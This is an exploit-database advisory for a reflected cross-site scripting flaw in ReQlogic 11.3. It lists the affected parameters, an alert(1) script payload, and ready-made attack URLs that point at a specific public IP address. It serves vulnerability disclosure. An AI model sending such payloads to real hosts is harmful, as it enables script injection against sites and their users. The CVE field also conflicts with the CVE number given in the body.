ReQlogic 11.3 Cross Site Scripting

2023.03.30
Credit: Okan Kurtulus
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) # Date: 9 October 2022 # Exploit Author: Okan Kurtulus # Vendor Homepage: https://reqlogic.com # Version: 11.3 # Tested on: Linux # CVE : 2022-41441 # Proof of Concept: 1- Install ReQlogic v11.3 2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3 3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters. #XSS Payload: </script><script>alert(1)</script> #Affected Prameters POBatch WaitDuration #Final URLs http://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3 http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top